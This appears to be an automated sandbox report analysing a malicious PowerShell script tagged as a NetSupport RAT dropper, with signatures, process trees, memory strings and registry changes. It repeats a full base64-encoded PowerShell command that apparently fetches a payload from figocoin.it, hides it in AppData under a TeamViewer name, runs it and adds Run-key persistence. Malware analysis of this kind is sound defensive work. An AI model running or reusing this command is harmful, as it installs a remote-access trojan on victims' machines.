Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
6471bc8dac218.ps1

Overview

General Information

Sample Name:6471bc8dac218.ps1
Analysis ID:876993
MD5:12838e82541973a0e63820a421d4b8f6
SHA1:6cca7441a420f3d3082f6787abeb6c5a6d9ae99b
SHA256:b146dd7f30d4ed7536f62fae414f34f45ca32173224ad3b4bc0a14651108b1ba
Tags:netsupportps1rat
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 2220 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\6471bc8dac218.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA= MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://figocoin.it/auth.phpAvira URL Cloud: Label: malware
Source: https://figocoin.it/auth.phpVirustotal: Detection: 17%Perma Link
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000003.454710662.00000220F6E6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.469891303.00000220F6D8B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.454165981.00000220F6D79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbY source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb source: powershell.exe, 00000002.00000002.435649399.0000023CABAD2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateDataP
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ObsoletedEle
Source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000003.410344195.0000023CAB920000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.433865748.0000023CAB93A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000003.410792964.0000023CABB97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.457788771.00000220DEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.413701569.0000023C938B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://figocoin.it/auth.php
Source: powershell.exe, 00000002.00000002.413701569.0000023C93AB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.413701569.0000023C94DB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.431032973.0000023CA3922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2238
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 2238Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBABF7AA2A2_2_00007FFBABF7AA2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBABF885AA2_2_00007FFBABF885AA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBABF821C52_2_00007FFBABF821C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBABF8220C2_2_00007FFBABF8220C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBABF81AC52_2_00007FFBABF81AC5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\6471bc8dac218.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -win hid -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGYAaQBnAG8AYwBvAGkAbgAuAGkAdAAvAGEAdQB0AGgALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABUAGUAYQBtAFYAaQBlAHcAZQByAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAFQAZQBhAG0AVgBpAGUAdwBlAHIAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\TeamViewer_3533Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xqh5g0kf.gjx.ps1Jump to behavior
Source: classification engineClassification label: mal72.troj.evad.winPS1@4/8@0/0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000003.454710662.00000220F6E6D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.469891303.00000220F6D8B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000003.454165981.00000220F6D79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbY source: powershell.exe, 00000000.00000002.469295261.00000220F6CF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ll\System.Core.pdb source: powershell.exe, 00000002.00000002.435649399.0000023CABAD2000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBAC0461EC push eax; ret 0_2_00007FFBAC0461ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBAC045EF4 push ebx; ret 0_2_00007FFBAC045EF5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBAC045204 pushad ; ret 0_2_00007FFBAC045205
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFBAC045C2B push esi; ret 0_2_00007FFBAC045C2C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBAC04AC0F push es; ret 2_2_00007FFBAC04AC11
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBAC047410 pushfd ; ret 2_2_00007FFBAC047411
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFBAC049413 push ds; ret 2_2_00007FFBAC049415
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run TeamViewer_3533Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
